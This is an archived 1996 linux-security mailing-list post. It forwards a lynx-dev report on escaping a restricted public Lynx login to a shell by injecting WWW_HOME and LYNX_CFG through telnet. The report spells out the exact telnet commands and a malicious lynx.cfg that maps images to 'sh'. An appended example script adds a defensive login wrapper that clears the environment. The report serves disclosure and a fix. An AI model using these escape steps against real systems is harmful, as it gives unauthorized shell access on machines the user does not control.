[1103] in linux-security and linux-alert archive
[linux-security] LYNX-DEV security problem with environment for lynx -restrictions=all (fwd)
daemon@ATHENA.MIT.EDU (Roscinante)
Tue Aug 27 22:06:39 1996
Date: Mon, 26 Aug 1996 09:36:14 -0400 (EDT)
From: Roscinante <rosc@fbn.globalent.net>
To: Linux-security <linux-security@tarsier.cv.nrao.edu>
This came in today on the lynx-dev list, thought it would be of interest to
linux security (not sure what OS this fellow is using, I sent a reply, and
told him about the 'fixed' telnet)
---------- Forwarded message ----------
Date: Sun, 25 Aug 1996 23:21:03 EDT
From: mhpower@MIT.EDU
Reply-To: lynx-dev@sig.net
To: lynx-dev@sig.net
Subject: LYNX-DEV security problem with environment for lynx -restrictions=all
In using Lynx 2.5FM (22 August version) from a public-login account
whose shell runs "lynx -restrictions=all", I've found it's possible to
defeat some restrictions and obtain interactive access to /bin/sh by
passing the environment variables WWW_HOME and LYNX_CFG via telnetd.
The attack will work on more system types if it's possible to write to
some filesystem that's mounted by the target machine. For example,

    % telnet
    telnet> env define WWW_HOME http://anyserver/anything.gif
    telnet> env define LYNX_CFG /afs/some.cell/users/myname/lynx.cfg
    telnet> open public-lynx-host -l lynx

where /afs/some.cell/users/myname/lynx.cfg contains

    SUFFIX:.gif:image/gif
    VIEWER:image/gif:sh

This gives me an sh shell on public-lynx-host with the uid of "lynx".
On some system types, it may instead be possible to do

    telnet> env define LYNX_CFG /dev/stdin

and type in the desired contents (e.g., the SUFFIX and VIEWER lines).

I'd suggest adding support for "-restrictions=env" which would prevent
lynx from modifying its behavior based on any call to getenv. Of
course, a public-login account might be better configured to
explicitly set WWW_HOME and LYNX_CFG (or use "-cfg=") before starting
lynx, but I think the risk of setup mistakes would be reduced if
ignoring the environment were supported within the lynx source code.

Matt
~~
All that is gold does not glitter..
Not all those who wander are lost..J.R.R.T.
And the knowledge that they fear
is a weapon to be held against them.. N.P.
Rush 2112
Ghost in the Machine (wraith@styx.ios.com)
Roscinante (rosc@fbn.globalent.net)
http://www.globalent.net/users/fbn
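
The forwarded message suggests that a public-login account explicitly set WWW_HOME and LYNX_CFG (or use "-cfg=") before starting lynx. One way to do that is a small login wrapper, shown here as an added example that is not part of the original posts or of lynx itself. The wrapper name "lynx-login", the config path and the start URL are assumptions.

```shell
#!/bin/sh
# Added example: hypothetical login wrapper for a public "lynx" account.
# The paths, start URL and wrapper name "lynx-login" are assumptions.
SAFE_PATH=/usr/bin:/bin
SAFE_CFG=/usr/local/lib/lynx.cfg      # assumed admin-owned config file
SAFE_HOME_URL=http://localhost/       # assumed start page

# Accept only a short, plain terminal name; anything else becomes vt100.
safe_term() {
    case "$1" in
        ""|*[!A-Za-z0-9_+.-]*) echo vt100 ;;
        *) if [ "${#1}" -le 32 ]; then echo "$1"; else echo vt100; fi ;;
    esac
}

# Reject a config that is missing, not a regular file (e.g. /dev/stdin),
# a symlink, or writable by group or other.
cfg_is_trusted() {
    [ -f "$1" ] && [ ! -L "$1" ] || return 1
    [ -z "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Run "$@" with an environment built from scratch, so nothing supplied by
# the remote telnet client (WWW_HOME, LYNX_CFG, ...) survives env -i.
run_clean() {
    env -i PATH="$SAFE_PATH" TERM="$(safe_term "${TERM:-}")" \
        WWW_HOME="$SAFE_HOME_URL" LYNX_CFG="$SAFE_CFG" "$@"
}

start_lynx() {
    cfg_is_trusted "$SAFE_CFG" || { echo "lynx.cfg not trusted" >&2; exit 1; }
    run_clean lynx -cfg="$SAFE_CFG" -restrictions=all "$SAFE_HOME_URL"
}

# Launch only when installed under the wrapper name, so the functions can
# be sourced and exercised on their own.
case "${0##*/}" in
    lynx-login|-lynx-login) start_lynx ;;
esac
```

Because the environment is rebuilt with env -i, any variable defined on the telnet client side is discarded before lynx starts, not only the two named in the report.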